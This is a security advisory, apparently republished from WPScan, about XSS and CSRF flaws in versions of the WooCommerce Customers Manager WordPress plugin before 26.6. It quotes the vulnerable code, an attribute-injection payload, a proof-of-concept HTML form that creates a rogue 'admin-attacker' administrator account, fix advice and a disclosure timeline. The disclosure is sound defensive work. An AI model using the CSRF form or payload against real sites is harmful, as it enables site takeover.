Connect with us

WordPress News

WooCommerce Customers Manager WordPress Plugin – Multiple Security Vulnerabilities




A member of the WPScan research team discovered two security vulnerabilities within the premium WooCommerce Customers Manager WordPress plugin, versions less than 26.6.

The following two vulnerabilities were identified and added to our WordPress vulnerability database:

Technical Details

While checking if a reported privilege escalation vulnerability was properly fixed, it was identified that the issue was still exploitable via a Cross-Site Request Forgery (CSRF) attack. An attempted fix for a second security issue, an Authenticated Cross-Site Scripting(XSS) vulnerability, was also found to not be sufficient, still allowing the attack.

At WPScan we work closely with plugin authors to ensure the fixes that they implement are done correctly, to ensure that our users are kept safe.

Authenticated Reflected Cross-Site Scripting (XSS)

The wccm_customers_ids and wccm_customers_emails parameters were output in href attributes, after being sanitised with the sanitize_text_field() function, which is not appropriate for such case, as payload such as ' injected-attribute=value will still be injected.

In classes/admin/WCCM_CustomerGuestList.php

<h2 class="nav-tab-wrapper">
  <a class='nav-tab' href='?page=woocommerce-customers-manager<?php if($this->filter_by_product_id >0) echo '&filter-by-product=".$this->filter_by_product_id; if(isset($_REQUEST["wccm_customers_ids'])) echo '&wccm_customers_ids=".sanitize_text_field($_REQUEST["wccm_customers_ids']);  if(isset($_REQUEST['wccm_customers_emails'])) echo '&wccm_customers_emails=".sanitize_text_field($_REQUEST["wccm_customers_emails']); echo '&wccm_already_encoded=yes'; ?>'>Registered</a>
  <a class='nav-tab nav-tab-active' href='?page=woocommerce-customers-manager&action=wccm-guests-list<?php if($this->filter_by_product_id >0) echo '&filter-by-product=".$this->filter_by_product_id; if(isset($_REQUEST["wccm_customers_ids'])) echo '&wccm_customers_ids=".sanitize_text_field($_REQUEST["wccm_customers_ids']); if(isset($_REQUEST['wccm_customers_emails'])) echo '&wccm_customers_emails=".sanitize_text_field($_REQUEST["wccm_customers_emails']);?>'>Guests</a>

Proof of Concept (PoC)

Log on to the blog as administraor and open the below URLs:


Arbitrary User Account Creation/Update via CSRF

The upload_csv AJAX action, available to authenticated users, did not have any CSRF check, allowing attackers to make logged in users with the manage_woocommerce capability (by default administrator) import arbitrary accounts. This could lead to rogue administrator accounts to be created and the blog being compromised.

In classes/admin/WCCM_CustomerImport.php

public function __construct()
  add_action( 'wp_ajax_upload_csv', array( &$this, 'process_csv_upload_ajax' ) );
function process_csv_upload_ajax()

  $csv_array = explode("<#>", $_POST['csv']);

Proof of Concept (PoC)

Log on to the blog, as a user with the manage_woocommerce capability (by default administrator), and open the HTML file below:

    <form action="" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="action" value="upload_csv" />
      <input type="hidden" name="send-notification-email" value="no" />
      <input type="hidden" name="csv" value="ID","Password","Role","Login","Email"<#>"","Passw0rd","administrator","admin-attacker","[email protected]"" />
      <input type="submit" value="Submit request" />

This will create a new administrator account, with the admin-attacker username.

  • Proplerly sanitise, validate and escape user inputs (the esc_attr() WP function should be used to escape output in attributes)
  • Adds a CSRF check to the process_csv_upload_ajax() method to prevent CSRF attacks


  • March 11th, 2021 – Improper fixes identified and confirmed. Vendor contacted via
  • March 16th, 2021 – No response from vendor, escalated to Envato.
  • March 17th, 2021 – v26.6 released, fixing the issues (confirmed on March 30th via source code provided by the vendor).
  • March 30th, 2021 – Vulnerabilities published on and sent out to our users.
  • April 8th, 2021 – This blog post released.

Source link

WP Guy News is built to give as close to a single source of info for all the WordPress news. It is sponsored by Your WP Guy which is a WordPress Security and Maintenance company. You can learn more about our company here: Your WP Guy

Continue Reading
Click to comment

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.